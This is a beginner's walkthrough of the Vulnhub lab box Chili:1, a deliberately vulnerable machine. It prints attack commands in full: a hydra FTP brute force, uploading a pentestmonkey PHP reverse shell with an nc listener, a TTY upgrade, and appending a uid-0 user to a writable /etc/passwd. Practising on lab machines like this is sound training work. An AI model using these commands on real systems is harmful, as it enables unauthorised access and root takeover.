Chili:1 [Vulnhub] detailed walkthrough
Hi Hackers
this is my first write-up , so please ignore some mistakes
so in this we will exploit the machine chili:1 posted by @SunCSR Team
this is the great box with some new concept of getting a foothold ,i will rate the machine as easy to medium but worthy to hack :D
so here is the brief how this goes
- nmap scanning
- ftp bruteforce
- finding a writable directory and getting a shell
- privsec using writable /etc/passwd file
so guys first setup the machine in the vmware get the ip address using netdiscover or arp-scan -l
now nmap scanning my favourite command for that is
nmap -A -sV -sC -vv $IP
now we got the ports 21 and 80 open
first thing i do is to check for anonymous login but that's not successful then i go for web enumeration i browsed the website manually i got nothing except an image of chili then i run the gobuster to enumerate for directories
gobuster dir -u http://$IP:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,bak,conf -t 200
go nothing then i gonna think of steganography i downloaded the image showing at index.html
and tried tools like exiftool, steghide, stegoveritas , binwalk
got nothing then i go back to the description of the machine there is a line by author : “If you ever get stuck, try again with the name of the lab”
then i got the name chili can be username for ftp then i remembered my friend hydra
hydra -l chili -P /usr/share/wordlist/rockyou.txt -t 64 ftp://$IP
huuh! i got something to proceed with i log-in to ftp using the credentials and see that all files are shared with ftp now i am looking for flags or some interesting file but i got nothing then i browsed to /var/www/html there i found a writable directory .nano where i can upload my reverse shell
i just go the the pentestmonkey and downloaded my shell now
change the ip to my localhost address in the reverse shell and upload it through ftp
put /root/Document/shell.php /var/www/html/.nano/shell.php
now listen to your local machine with nc -lnvp 1234
and browse the shell.php file using browser , but i got internal server error 500 after some time i remember that i forgotten to give executable permission to our shell i go back to ftp and changed the permission
chmod 777 shell.php
now browsed and got my initial foothold on the machine now my first step is to upgrade my shell to tty for that
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
now there in no user flag you have to escalate privileges to get the only flag which is in the root directory
for that i copied linuxpeas to machine and run it i found that there is
/etc/passwd file is writable
WoW peace of cake for privsec
now we have perl in the machine to generate encrypted password for that
perl -le ‘print crypt( “password”, “salt”)’
from this we will get a encrypted passwword
and then echo a user and password to /etc/passwd file
echo “fuds:Encrypted_password:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
now simply switch to root using su fuds and entering the created passwd and go to the /root directory and cat the proof.txt file for the flag
thanks for reading
thanks @SunCSR Team for creating this awesome box
references: https://hacknpentest.com/linux-privilege-escalation-via-writeable-etc-passwd-file/